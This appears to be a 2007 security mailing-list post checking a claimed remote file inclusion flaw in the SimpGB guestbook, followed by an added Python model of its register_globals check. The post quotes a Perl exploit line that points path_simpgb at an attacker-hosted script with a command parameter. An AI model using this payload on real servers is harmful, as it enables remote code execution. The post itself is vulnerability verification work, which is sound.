[VIM] probably true: SimpGB RFI, likely dynamic variable evaluation
str0ke
str0ke at milw0rm.com
Thu May 24 19:03:57 UTC 2007
exploit code
#######################
$req = HTTP::Request->new(GET
=>$Path.'guestbook.php?path_simpgb='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or
die "\nCould Not connect\n";
#######################
By default the config.php script doesn't initialize the no_rgcheck
variable; it just has it commented out. Pretty easy to bypass this if
register globals = on.
#########################
if(!$no_rgcheck)
{
    $rg_ini=@ini_get('register_globals');
    if($rg_ini || (strtolower($rg_ini)=='on'))
        die("register_globals should be set to off for security reasons");
}
# This shouldn't overwrite path_ or url_ variables correct?
while( list($var, $param) = @each($_GET) )
{
    if(!isset($$var))
    {
        if((substr($var,0,4)!="url_") && (substr($var,0,5)!="path_"))
        {
            $$var=$_GET[$var];
            if(!get_magic_quotes_gpc())
                $$var=addslashes($$var);
        }
    }
}
After installing the app it doesn't seem vulnerable, with or without
the rg check.
/str0ke
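
Added example, not part of str0ke's message and not SimpGB code: a small Python model of the quoted register_globals check and $_GET import loop, for checking which request variables can reach the script's global scope. The names simulate, preset and magic_quotes are hypothetical, the request values are constructed, and preset stands in for whatever config.php assigns, which the post does not show.

```python
# Added model, not SimpGB code: which request variables become script
# globals under the quoted register_globals check and $_GET import loop.
_ESC = str.maketrans({"'": "\\'", '"': '\\"', "\\": "\\\\", "\0": "\\0"})

def addslashes(value):
    """PHP addslashes(): backslash-escape quotes, backslash and NUL."""
    return value.translate(_ESC)

def php_truthy(value):
    """PHP boolean conversion for the value types used here."""
    return value not in (None, "", "0", 0, False)

def simulate(get_params, register_globals, preset=None, magic_quotes=False):
    """Return (died, scope) after the check and the import loop.

    preset is what the application assigns before the check. That is an
    assumption of this model: the post does not show config.php's contents.
    """
    scope = {}
    if register_globals:
        # PHP copies request variables into the global scope before the script runs.
        scope.update(get_params)
    scope.update(preset or {})  # the script's own assignments overwrite them

    # if(!$no_rgcheck) { if register_globals is on: die(...) }
    if not php_truthy(scope.get("no_rgcheck")) and register_globals:
        return True, scope

    # while(list($var,$param)=each($_GET)) { if(!isset($$var)) ... }
    for var, value in get_params.items():
        if scope.get(var) is not None:            # isset($$var)
            continue
        if var.startswith(("url_", "path_")):     # protected prefixes
            continue
        scope[var] = value if magic_quotes else addslashes(value)
    return False, scope

if __name__ == "__main__":
    # Constructed request values, not taken from the exploit.
    query = {"path_simpgb": "REQUEST_VALUE", "page": "o'brien"}
    for rg in (False, True):
        for extra in ({}, {"no_rgcheck": "1"}):
            for preset in ({}, {"path_simpgb": "./"}):
                died, scope = simulate({**query, **extra}, rg, preset)
                print(rg, extra, preset, "died" if died else scope.get("path_simpgb"))
```

In this model a request-supplied path_simpgb only survives when register_globals is on, no_rgcheck arrives with the request, and the script never assigns path_simpgb itself; the import loop alone never sets it.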